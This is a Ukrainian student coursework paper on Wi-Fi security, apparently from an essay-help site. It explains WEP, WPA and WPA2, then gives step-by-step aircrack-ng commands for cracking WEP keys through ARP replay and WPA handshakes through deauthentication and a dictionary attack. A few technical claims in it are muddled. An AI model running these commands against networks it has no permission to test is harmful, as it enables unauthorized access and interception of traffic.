Допомога у написанні освітніх робіт...
Допоможемо швидко та з гарантією якості!

Злам алгоритму мереж Wi-Fi - WEP, WPA, WPA-2

КурсоваДопомога в написанніДізнатися вартістьмоєї роботи

Розуміючи, що низька безпека буде перешкоджати активному використанню бездротових технологій, виробники звернули увагу на специфікацію 802.1x, призначену для надання єдиного для всіх мережевих технологій в рамках групи стандартів 802 мережевого механізму контролю доступу. Цей стандарт, званий також динамічним WEP, застосовується і до бездротових технологій, що досягається завдяки використанню… Читати ще >

Злам алгоритму мереж Wi-Fi - WEP, WPA, WPA-2 (реферат, курсова, диплом, контрольна)

КУРСОВА РОБОТА Злам алгоритму мереж Wi-Fi — WEP, WPA, WPA-2

Вступ

Wi-Fi поступово входить в число незамінних технологій, тим більше що підключення смартфона або планшетного ПК до мережі за допомогою кабелю є не самим зручним рішенням. І все ж при використанні Wi-Fi-з'єднання деяких терзають сумніви: чи можуть дані бути перехоплені по бездротовому зв’язку? Інших заспокоює помилкова безпека: пароль і фільтрація за MAC-адресою повинні захистити від злому. Але чи так це? Насправді безпека залежить від обачності самого користувача. Невідповідні методи захисту, простий пароль і легковажне ставлення до сторонніх користувачів в домашній мережі дають зловмисникам додаткові можливості для атаки.

1. Безпека Wi-Fi мереж

Як і будь-яка комп’ютерна мережа, Wi-Fi — є джерелом підвищеного ризику несанкціонованого доступу. Крім того, проникнути в бездротову мережу значно простіше, ніж в звичайну, — не потрібно підключатися до проводів, досить опинитися в зоні прийому сигналу.

Бездротові мережі відрізняються від кабельних тільки на перших двох — фізичному (Phy) і частково канальному (MAC) — рівнях семирівневої моделі взаємодії відкритих систем. Більш високі рівні реалізуються як в дротяних мережах, а реальна безпека мереж забезпечується саме на цих рівнях. Тому різниця в безпеці тих і інших мереж зводиться до різниці в безпеці фізичного і MAC-рівнів.

Хоча сьогодні в захисті Wi-Fi-мереж застосовуються складні алгоритмічні математичні моделі аутентифікації, шифрування даних і контролю цілісності їх передачі, тим не менш, вірогідність доступу до інформації сторонніх осіб є дуже істотною. І якщо налаштуванні мережі не приділити належної уваги зловмисник може:

роздобути доступ до ресурсів і дискам користувачів Wi-Fi-мережі, а через неї і до ресурсів LAN;

підслуховувати трафік, витягувати з нього конфіденційну інформацію;

спотворювати проходить в мережі інформацію;

скористатися інтернет-трафіком;

атакувати ПК користувачів і сервери мережі

впроваджувати підроблені точки доступу;

розсилати спам, і здійснювати інші протиправні дії від імені вашої мережі.

На ранньому етапі використання Wi-Fi мереж був пароль SSID (Server Set ID) для доступу в локальну мережу, але згодом виявилося, що дана технологія не може забезпечити надійний захист.

Головним захистом довгий час було використання цифрових ключів шифрування потоків даних за допомогою функції Wired Equivalent Privacy (WEP). Самі ключі є із себе звичайні паролі з довжиною від 5 до 13 символів ASCII. Дані шифруються ключем з розрядністю від 40 до 104 біт. Але це не цілий ключ, а тільки його статична складова. Для посилення захисту застосовується так званий вектор ініціалізації Initialization Vector (IV), який призначений для рандомізації додаткової частини ключа, що забезпечує різні варіації шифру для різних пакетів даних. Даний вектор є 24-бітовим. Таким чином, в результаті ми отримуємо загальне шифрування з розрядністю від 64 (40 +24) до 128 (104 +24) біт, в результаті при шифруванні ми оперуємо і постійними, і випадково підібраними символами. Але, як виявилося, зламати такий захист можна: відповідні утиліти присутні в Інтернеті (наприклад, AirSnort, WEPcrack). Основне її слабке місце — це вектор ініціалізації. Оскільки ми говоримо про 24 біти, це має на увазі близько 16 мільйонів комбінацій, після використання цієї кількості, ключ починає повторюватися.

Хакеру необхідно знайти ці повтори (від 15 хвилин до години для ключа 40 біт) і за секунди зламати решту частини ключа. Після цього він може входити в мережу як звичайний зареєстрований користувач.

Як показав час, WEP теж виявилася не найнадійнішою технологією захисту. Після 2001 року для дротяних і бездротових мереж було запроваджено новий стандарт IEEE 802.1X, який використовує варіант динамічних 128-розрядних ключів шифрування, тобто періодично змінюються в часі. Таким чином, користувачі мережі працюють сеансами, по завершенні яких їм надсилається новий ключ. Наприклад, Windows XP підтримує даний стандарт, і за замовчуванням час одного сеансу дорівнює 30 хвилинам. IEEE 802.1X — це новий стандарт, який виявився ключовим для розвитку індустрії бездротових мереж в цілому. За основу узято виправлення недоліків технологій безпеки, вживаних в 802.11, зокрема, можливість злому WEP, залежність від технологій виробника і т. п. 802.1X дозволяє підключати в мережу навіть PDA-пристрої, що дозволяє більш вигідно використовувати саму ідею безпровідного зв’язку. З іншого боку, 802.1X і 802.11 є сумісними стандартами. У 802.1X застосовується той же алгоритм, що і в WEP, а саме — RC4, але з деякими відмінностями. 802.1X базується на протоколі розширеної аутентифікації (EAP), протоколі захисту транспортного рівня (TLS) і сервері доступу Remote Access Dial-in User Server. Протокол захисту транспортного рівня TLS забезпечує взаємну аутентифікацію і цілісність передачі даних. Всі ключі є 128-розрядними за умовчанням.

В кінці 2003 року був впроваджений стандарт Wi-Fi Protected Access (WPA), який поєднує переваги динамічного оновлення ключів IEEE 802.1X з кодуванням протоколу інтеграції тимчасового ключа TKIP, протоколом розширеної аутентифікації (EAP) і технологією перевірки цілісності повідомлень MIC. WPA — це тимчасовий стандарт, про який домовилися виробники устаткування, поки не набув чинності IEEE 802.11i. По суті, WPA = 802.1X + EAP + TKIP + MIC, де:

WPA — технологія захищеного доступу до бездротових мереж

EAP — протокол розширеної аутентифікації (Extensible Authentication Protocol)

TKIP — протокол інтеграції тимчасового ключа (Temporal Key Integrity Protocol)

MIC — технологія перевірки цілісності повідомлень (Message Integrity Check).

Стандарт TKIP використовує автоматично підібрані 128-бітові ключі, які створюються непередбачуваним способом і загальне число варіацій яких досягає 500 мільярдів. Складна ієрархічна система алгоритму підбору ключів і динамічна їх заміна через кожних 10 Кбайт (10 тис. переданих пакетів) роблять систему максимально захищеною. Від зовнішнього проникнення і зміни інформації також обороняє технологія перевірки цілісності повідомлень (Message Integrity Check).

Досить складний математичний алгоритм дозволяє звіряти відправлені в одній точці і отримані в іншій дані. Якщо відмічені зміни і результат порівняння не сходиться, такі дані вважаються помилковими і викидаються.

Правда, TKIP зараз не є кращим в реалізації шифрування, оскільки в силу вступають нові алгоритми, засновані на технологі

Advanced Encryption Standard (AES), яка, вже давно використовується в VPN. Що стосується WPA, підтримка AES вже реалізована в Windows XP

Крім цього, паралельно розвивається безліч самостійних стандартів безпеки від різних розробників, зокрема, в даному напрямку процвітають Intel і Cisco. У 2004 році з’являється WPA2, або 802.11i, який, в даний час є максимально захищеним.

Таким чином, на сьогоднішній день у звичайних користувачів і адміністраторів мереж є всі необхідні засоби для надійного захисту Wi-Fi, і за відсутності явних помилок (горезвісний людський фактор) завжди можна забезпечити рівень безпеки, відповідний цінності інформації, що знаходиться в такій мережі.

Сьогодні бездротову мережу вважають захищеною, якщо в ній функціонують три основних складових системи безпеки: аутентифікація користувача, конфіденційність і цілісність передачі даних. Для отримання достатнього рівня безпеки необхідно скористатися рядом правил при організації і настройці приватної Wi-Fi-мережі:

використовувати протокол 802.1X;

заборонити доступ до налаштувань точки доступу за допомогою бездротового підключення;

управляти доступом клієнтів по MAC-адресами;

заборонити трансляцію в ефір ідентифікатора SSID;

розташовувати антени як найдалі від вікон, зовнішніх стін будівлі, а також обмежувати потужність радіовипромінювання;

використовувати максимально довгі ключі;

використовувати WPA-шифри;

користуватися складним паролем для доступу до налаштувань точки доступу;

по можливості не використовувати в бездротових мережах протокол TCP / IP для організації папок, файлів і принтерів загального доступу;

не дозволяти гостьовий доступ до ресурсів загального доступу, використовувати довгі складні паролі;

не використовувати в бездротовій мережі DHCP. Вручну розподілити статичні IP-адреси між легітимними клієнтами безпечніше;

Так само загрозу мережевій безпеці можуть представляти природні явища і технічні пристрої, проте тільки люди (незадоволені звільнені службовці, хакери, конкуренти) впроваджуються в мережу для навмисного отримання або знищення інформації і саме вони представляють найбільшу загрозу.

2. Ключі безпеки Wi-Fi

2.1 WEP (Wired Equivalent Privacy)

Стійкість ключа:

злам: PTW-атака, FMS-атака, атака KoreK.

час зламу: 5−15 хвилин.

безпека: викрадення данних може здійснити навіть любитель.

Використовує генератор псевдовипадкових чисел (алгоритм RC4) для отримання ключа, а також вектори ініціалізації. Так як останній компонент не зашифрований, можливо втручання третіх осіб та відтворення WЕР-ключа.

Оскільки система бездротового зв’язку, побудована на базі статично розподілених серед всіх абонентів ключів шифрування WEP і аутентифікації за MAC-адресами, не забезпечує належного захисту, багато виробників самі почали покращувати методи захисту. Першою спробою стало збільшення довжини ключа шифрування — з 40 до 128 і навіть до 256 біт. По такому шляху пішли компанії D-Link, US Robotics і ряд інших. Однак застосування такого розширення, що отримав назву WEP2, призводило до несумісності з уже наявним обладнанням інших виробників. До того ж використання ключів великої довжини тільки збільшувало обсяг роботи, здійснюваної зловмисниками, і не більше того.

Розуміючи, що низька безпека буде перешкоджати активному використанню бездротових технологій, виробники звернули увагу на специфікацію 802.1x, призначену для надання єдиного для всіх мережевих технологій в рамках групи стандартів 802 мережевого механізму контролю доступу. Цей стандарт, званий також динамічним WEP, застосовується і до бездротових технологій, що досягається завдяки використанню протоколу EAP (Extensible Authentication Protocol). Даний протокол дозволяє усунути загрозу створення помилкових точок доступу, підвищити криптографічну стійкість трафіку до злому і полегшити розподіл аутентифікаційної інформації по абонентам мережі бездротового доступу.

З часом протокол EAP видозмінювався і зараз існує декілька його різновидів:

* Cisco Wireless EAP (LEAP);

* Protected EAP (PEAP);

* EAP-Transport Layer Security (EAP-TLS);

* EAP-Tunneled (EAP-TTLS);

Треба зауважити, що компанія однією з перших реалізувала проект цього стандарту в своєму обладнанні Aironet. Клієнт 802.1x вже вбудований в операційну систему Windows XP; для інших клієнтів необхідно додатково встановлювати відповідне програмне забезпечення.

Новизна стандарту 802.1x викликає при його застосуванні ряд складнощів, першою за значущістю з яких є можливий конфлікт між собою обладнання різних виробників, а другий — відсутність клієнтів 802.1x для деяких типів пристроїв доступу. Залишається, щоправда, людський фактор, який також заважає підвищенню захищеності будь-якої технології, і не тільки бездротової. Наприклад, за даними дослідження TNS Intersearch, що проводилося за замовленням Microsoft, з усіх компаній, які розгорнули бездротові точки доступу у себе в мережі, тільки 42% задіяли механізми аутентифікації - ніякі технічні рішення в такій ситуації не допоможуть.

Проте слабкість базових механізмів захисту не обмежується однією лише аутентифікацією. Залишаються відкритими питання дешифрування трафіку, управління ключами, підміни повідомлень і т. п., які також активно вирішуються світовою спільнотою. Наприклад, остання з названих проблем усувається протоколом MIC (Message Integrity Check), що дозволяє захистити передані пакети від зміни.

Слабка криптографія WEP поступово замінюється іншими алгоритмами. Деякі виробники пропонують використовувати DES або TripleDES в якості альтернативи RC4. Цікаве рішення представила компанія Fortress, яка розробила протокол канального рівня wLLS (wireless Link Layer Security), що базується:

* на алгоритмі обміну ключами Диффі-Хеллмана;

*128-розрядному шифруванні IDEA (опціонально можуть використовуватися також DES і 3DES);

* динамічної зміні ключів через кожні дві години;

* використанні двох пар ключів (для шифрування мережевого трафіку і шифрування при обміні ключами).

Застосування одного і того ж ключа шифрування WEP призводило до накопичення зловмисником обсягу даних, достатнього для злому використовуваної криптографії. Вирішенням проблеми стала динамічна зміна ключів, яку однією з перших реалізувала компанія Fortress у своєму протоколі wLLS. Змінювані через кожні дві години ключі ускладнювали роботу криптоаналітика.

Другий підхід, запропонований в протоколі TKIP (Temporal Key Integrity Protocol), полягає в зміні ключів через кожні 10 Кбайт переданих даних. Цей протокол, замінивши статичний ключ шифрування динамічно змінюються і розподілюваними по клієнтам, дозволив збільшити їх довжину — з 40 до 128 біт. При цьому RC4 і раніше залишався алгоритмом шифрування.

Багато виробників роблять ставку на більш складний алгоритм AES (довжина ключів шифрування 128, 192 або 256 біт), що став національним стандартом шифрування США. Однак його впровадження зажадає реалізації нових мікросхем в обладнанні, що, в свою чергу, позначиться на його ціні і на вартості переходу на нову версію.

Нові алгоритми та протоколи значно підвищували захищеність бездротових технологій і сприяли їх більш широкому поширенню, однак вони погано інтегрувалися один з одним, а обладнання, їх використовує, стикувалося тільки після докладання серйозних зусиль. Усунути всі ці недоліки дозволяє стандарт WPA.

Алгоритм роботи WEP-шифрування:

В основі WEP лежить потоковий шифр RC4, обраний через свою високої швидкості роботи і можливості використання змінної довжини ключа. Для підрахунку контрольних сум використовується CRC32.

Кадр WEP включає в себе наступні поля:

Незашифрована частина:

— вектор ініціалізації (англ. Initialization Vector) (24 біта)

— порожнє місце (англ. Padding) (6 біт)

— ідентифікатор ключа (англ. Key ID) (2 біта) Зашифрована частина:

— дані

— контрольна сума (32 біта) Шифруівння даних проходить наступним чином:

— контрольна сума від поля «дані» обчислюється за алгоритмом CRC32 і додається в кінець кадру.

— дані з контрольною сумою шифруються алгоритмом RC4, що використовують в якості ключа криптоалгоритму.

— проводиться операція XOR над вихідним текстом і шифротекстом.

— на початок кадру додається вектор ініціалізації та ідентифікатор ключа.

Дешифрування даних проходить наступним чином:

— до використовуваному ключу додається вектор ініціалізації.

— відбувається розшифрування з ключем, рівним сіду.

— проводиться операція XOR над отриманим текстом і шифротекстом.

— перевіряється контрольна сума.

2.2 WPA (Wi-Fi Protected Access)

wi fi мережа безпека злам Стійкість ключа:

злам: атака за словником, підбір паролю методом bruteforce

час зламу: 20−120 хвилин (ненадійний пароль) безпека: не захищена від досвідчених хакерів (ненадійній пароль) Анонсований альянсом Wi-Fi (колишній WECA) 31 жовтня 2002 року. Даний стандарт покликаний уніфікувати всі технології безпеки для бездротових мереж 802.11. В даний час в цей стандарт входять:

* аутентифікація користувачів за допомогою 802.1x і EAP;

* шифрування за допомогою TKIP;

* динамічний розподіл ключів за допомогою 802.1x;

* контроль цілісності за допомогою MIC (він же Michael).

Грунтується на механізмі WEP, але для розширеного захисту пропонує динамічний ключ. Ключі, згенеровані за допомогою алгоритму TKIP, можуть бути зламані за допомогою атаки Бека-Тевс або Охігаші-Морії. Для цього окремі пакети розшифровуються, піддаються маніпуляціям і знову відсилаються в мережу.

Навіть не беручи до уваги той факт що WEP, попередник WPA, не володіє якими механізмами аутентифікації користувачів як такий, його ненадійність полягає, передусім, в криптографічного слабкості алгоритму шифрування. Ключова проблема WEP полягає у використанні занадто схожих ключів для різних пакетів даних.

TKIP, MIC і 802.1X (частини рівняння WPA) внесли свою лепту в посилення шифрування даних мереж, що використовують WPA.

TKIP відповідає за збільшення розміру ключа з 40 до 128 біт, а також за заміну одного статичного ключа WEP ключами, які автоматично генеруються і розсилаються сервером аутентифікації. Крім того, в TKIP використовується спеціальна ієрархія ключів та методологія управління ключами, яка прибирає зайву передбачуваність, яка використовувалася для несанкціонованого зняття захисту WEP ключів.

Сервер аутентифікації, після одержання сертифіката від користувача, використовує 802.1X для генерації унікального базового ключа для сеансу зв’язку. TKIP здійснює передачу згенерованого ключа користувачеві і точці доступу, після чого вибудовує ієрархію ключів плюс систему управління. Для цього використовується двосторонній ключ для динамічної генерації ключів шифрування даних, які в свою чергу використовуються для шифрування кожного пакету даних. Подібна ієрархія ключів TKIP замінює один ключ WEP (статичний) на 500 мільярдів можливих ключів, які будуть використані для шифрування даного пакету даних.

Іншим важливим механізмом є перевірка цілісності повідомлень (Message Integrity Check, MIC). Її використовують для запобігання перехоплення пакетів даних, зміст яких може бути змінено, а модифікований пакет знову переданий по мережі. MIC побудована на основі потужної математичної функції, яка застосовується на стороні відправника і одержувача, після чого порівнюється результат. Якщо перевірка показує на розбіжність результатів обчислень, дані вважаються помилковими і пакет відкидається.

При цьому механізми шифрування, які використовуються для WPA і WPA-PSK, є ідентичними. Єдина відмінність WPA-PSK полягає в тому, що аутентифікація проводиться з використанням пароля, а не по сертифікату користувача.

Стандарт WPA перетворився в більш нову і розширену специфікацію 802.11i (або WPA2). Саме в WAP2 алгоритм шифрування WEP замінений на AES.

2.3 WPA2 (Wi-Fi Protected Access 2)

Використовує для шифрування надійний алгоритм AES. Поряд з TKIP додався протокол СCMP (CounterMode / CBC-MAC Protocol), який також базується на алгоритмі AES. Захищену за цією технологією мережу до теперішнього моменту зламати вдавалося декілька раз. Єдиною можливістю для хакерів є атака по словником або «метод грубої сили», коли ключ вгадується шляхом підбору, але при складному паролі підібрати його неможливо.

WPA2 визначається стандартом IEEE 802.11i, прийнятим у червні 2004 року, і покликаний замінити WPA. У ньому реалізовано CCMP і шифрування AES, за рахунок чого WPA2 став більш захищеним, ніж свій попередник. З 13 березня 2006 підтримка WPA2 є обов’язковою умовою для всіх сертифікованих Wi-Fi пристроїв.

Сьогодні найкращий захист забезпечує технологія WPA2, яка застосовується виробниками комп’ютерної техніки ще з 2004 року. Більшість пристроїв підтримують цей тип шифрування. Але, як і інші технології, WPA2 теж має своє слабке місце: за допомогою атаки по словнику або методу bruteforce («груба сила») хакери можуть взламувати паролі - правда, лише в разі їх ненадійності. Паролі на зразок «1234» або «lvanov» підбираються настільки швидко, що комп’ютер хакера навіть не встигає нагрітися. Метод bruteforce передбачає не використання готової бази даних, а, навпаки, підбір пароля шляхом перерахування всіх можливих комбінацій символів. Таким способом хакер може обчислити будь-який ключ — питання тільки в тому, скільки часу йому на це буде потрібно.

3. Злам мереж Wi-Fi

3.1 Злам мережі Wi-Fi на основі WEP шифрування

Всі атаки на WEP засновані на недоліках шифру RC4, таких, як можливість колізій векторів ініціалізації та зміни кадрів. Для всіх типів атак потрібно проводити перехоплення і аналіз кадрів бездротової мережі. В залежності від типу атаки, кількість кадрів, необхідних для зламу, різна. За допомогою програм, таких як Aircrack-ng, злам бездротової мережі з WEP шифруванням здійснюється дуже швидко і не вимагає спеціальних навичок.

Злам за допомогою програми Aircrack-ng.

Програма ця розробляється під лінукс, хоча є версія і під MS Windows, але вона не особливо підтримується і не надійно працює.

Так як Ubuntu це консольна система, установка виконується за рядом наступних команд:

wget http://download.aircrack-ng.org/aircrack-ng-1.0-rc3.tar.gz

tar — zxvf aircrack-ng-1.0-rc3.tar.gz

make

make install

Для початку потрібно перевести нашу wi-fi картку в режим «monitor mode». У випадку (c драйвером Madwifi-ng) це робиться так:

sudo wlanconfig ath0 destroy

sudo wlanconfig ath0 create wlandev wifi0 wlanmode monitor

Тепер нам знадобиться програма для моніторингу всіх беспроводих мереж в радіусі дії нашого Wi-Fi адаптера. Можно використовувати Airodump-ng з скаченого нами раніше програмного пакета Aircrack-ng.

Запускаємо airodump вказуючи обов’язковий параметр — ім'я интерфеса:

sudo airodump-ng ath0

Обираємо точку для підключення. Треба відзначити, що дуже важливим критерієм є рівень сигналу. Якщо сигнал нижче 20%, то нічого хорошого при взаємодії з цією мережею не вийде.

Наступним кроком дивимося на алгоритм шифрування (ENC):

OPN — мережа без шифрування.

WEP — мережа з WEP шифруванням, саме такі мережі представляють для нас найбільший інтерес.

WPA/WPA2 — мережі з WPA/WPA2 шифруванням.

Далі йде приклад взятий з сайту aircrack-ng.org. Зламу піддається мережу з ім'ям (essid) — teddy, MAC-адресою (bssid) — 00:14:6 C: 7E: 40:80, і «живе» на 9-му каналі. Всі ці дані знаходяться використовуючи airodump.

Запускаємо airodump направлений на обрану мережу, розташовану на 9-му каналі, із зазначенням адреси точки доступу, і імені файлу в який будуть записані спіймані пакети:

sudo airodump-ng — c 9 — bssid 00:14:6C:7E:40:80 — w output ath0

Далі в новому терміналі запускаємо aireplay, щоб подружитися з точкою доступу.

aireplay-ng -1 0 — e teddy — a 00:14:6C:7E:40:80 — h 00:0 °F:B5:88:AC:82 ath0

де:

— e teddy — назва мережі

— a 00:14:6C:7E:40:80 — MAC-адреса точки доступа

— h 00:0 °F:B5:88:AC:82 — наша MAC-адреса На виході повинні отримати:

18:18:20 Sending Authentication Request

18:18:20 Authentication successful

18:18:20 Sending Association Request

18:18:20 Association successful:-)

Тепер можна почати створювати паразитний трафік, знову відкриваємо нове вікно:

aireplay-ng -3 — b 00:14:6C:7E:40:80 — h 00:0 °F:B5:88:AC:82 ath0

На виході ми повинні отримати наступне:

Saving ARP requests in replay_arp-0321-191 525.cap

You should also start airodump-ng to capture replies.

Read 629 399 packets (got 316 283 ARP requests), sent 210 955 packets

Тепер перемикаємося на вікно в якому у нас запущений airodump і споглядаємо скажено зростаючу (при належному рівні сигналу) кількість пакетів. Зазвичай вистачає 20 тисяч пакетів для знаходження 64-х бітного ключа.

Коли потрібну кількість пакетів зібрано, що показує airodump в графі «# Data», запускаємо aircrack-ng і насолоджуємося процесом знаходження пароля (рис 3.1.1):

Рисунок 3.1.1 — Вікно знаходження ключа у програмному середовищі Aircrack-ng

Пароль в більшості випадків знаходиться в HEX-форматі, більшість роутерів переводять пароль в HEX кожен по своєму, тому перевести значення назад в ASCII іноді не вдається, хоча в деяких випадках початковий пароль пишеться рядочком в скобочках.

Ось власне і все. Цей пароль можна сміливо вводити, тільки двокрапки прибрати.

Якщо пароль не знайшовся, про що aircrack нам повідомить, швидше за все потрібно наловити ще пакетів, наприклад 40 тисяч.

Не вникаючи в тонкощі, злам мережі на основі WEP-шифрування зводиться до збору достатньої кількості пакетів та пошук векторів ініціалізації, але якщо між точкою доступу і клієнтом немає жодної активності, то ми можемо просидіти так тиждень.

3.2 Злам WPA/WPA2 мереж

6 листопада 2008 на конференції PacSec був представлений спосіб, що дозволяє зламати ключ TKIP, використовуваний в WPA, за 12−15 хвилин. Цей метод дозволяє прочитати дані, передані від точки доступу клієнтської машині, а також передавати підроблену інформацію на клієнтську машину. Дані, що передаються від клієнта до маршрутизатора, поки прочитати не вдалося. Ще однією умовою успішної атаки було включення QoS на маршрутизаторі.

У 2009 році співробітниками університету Хіросіми і університету Кобе, Тосіхіро Оігасі і Масакату Морії був розроблений і успішно реалізований на практиці новий метод атаки, який дозволяє зламати WPA з'єднання без обмежень, причому, в кращому випадку, часом злому складає 1 хвилину.

23 липня 2010 була опублікована інформація про вразливість Hole196 в протоколі WPA2. Використовуючи цю вразливість, авторизовані в мережі зловмисний користувач може розшифровувати дані інших користувачів, використовуючи свій закритий ключ. Ніякого злому ключів або брут-форс не потрібно.

Тим не менш, на даний момент основними методами злому WPA2 PSK є атака за словником і брут-форс. Для цього в режимі моніторингу бездротової карти сканується ефір і записуються необхідні пакети. Далі проводиться деавторізація клієнта для захоплення початкового обміну пакетами (handshake), або потрібно чекати поки клієнт зробить підключення. Після цього вже немає необхідності знаходитися недалеко від атакуємої точки доступу. Атака проводиться оффлайн за допомогою спеціальної програми і файлу з хендшейком.

Злам за допомогою програми Aircrack-ng.

Для початку, як звичайно, запускаємо airodump націлений на обрану мережу.

У випадку з WPA/WPA2 збір пакетів не спрацьовує, щоб зрушити з місця нам потрібен клієнт підключений до мережі, а якщо говорити ще точніше, нам треба застати момент підключення клієнта до мережі. Якщо клієнта немає, то сидимо і чекаємо.

Якщо клієнт вже підключений, запускаємо aireplay і обриваємо його аутентифікацію, тим самим змушуючи його з'єднатися знову:

aireplay-ng -0 1 — a 00:14:6C:7E:40:80 — c 00:0 °F:B5:FD:FB:C2 ath0

де:

— a 00:14:6C:7E:40:80 — MAC точки доступа

— c 00:0 °F:B5:FD:FB:C2 — MAC клиента На виході отримуємо:

11:09:28 Sending DeAuth to station — STMAC: [00:0 °F:B5:34:30:30]

В ідеалі ми повинні одержати так званий handshake, про що нас знову ж повідомить airodump, відобразивши в самому верхньому рядку праворуч повідомлення «WPA handshake: 00:14:6 C: 7E: 40:80».

Якщо цього не сталося, знову використовуємо aireplay.

Коли handshake спійманий, запускаємо aircrack, але на цей раз з використанням словника:

aircrack-ng — w password.lst — b 00:14:6C:7E:40:80 output*.cap

У даному випадку результат безпосередньо залежить від наявності потрібного пароля в нашому словнику, тому наші шанси прямо пропорційні розміру і якості нашого словника…

Словники можна без проблем знайти на просторах інтернету.

Висновки

Виконуючи цю курсову роботу я навчився основним принципам побудови захищеної мережі Wi-Fi, не залежно від того де вона буде використовуватися.

Користуватися застарілими стандартами шифрування (наприклад WEP-шифрування) досить небезпечно, оскільки алгоритм зламу настільки простий, що його зможе виконати кожен, не залежно від навичок та вмінь у мереживих технологіях. При настройці власної мережі, для мене вибір між WEP та WPA/WPA2 полягає лиш у тому, який пункт я оберу у меню (тобто для користувача все занадто просто: потрібно обрати тип шифрування у меню, поставивши навпроти нього відмітку).

Злам мережі залежить від часу на пошуки пароля використовуючи «грубу силу», тому у мережі достатньо буде установити МАС-фільтрацію та надійній пароль, використовуючи WPA/WPA2-шифрування.

Список використаної літератури

1. http://ru.wikipedia.org/wiki/

2. http://chip.ua

3. http://habrahabr.ru

Показати весь текст
Заповнити форму поточною роботою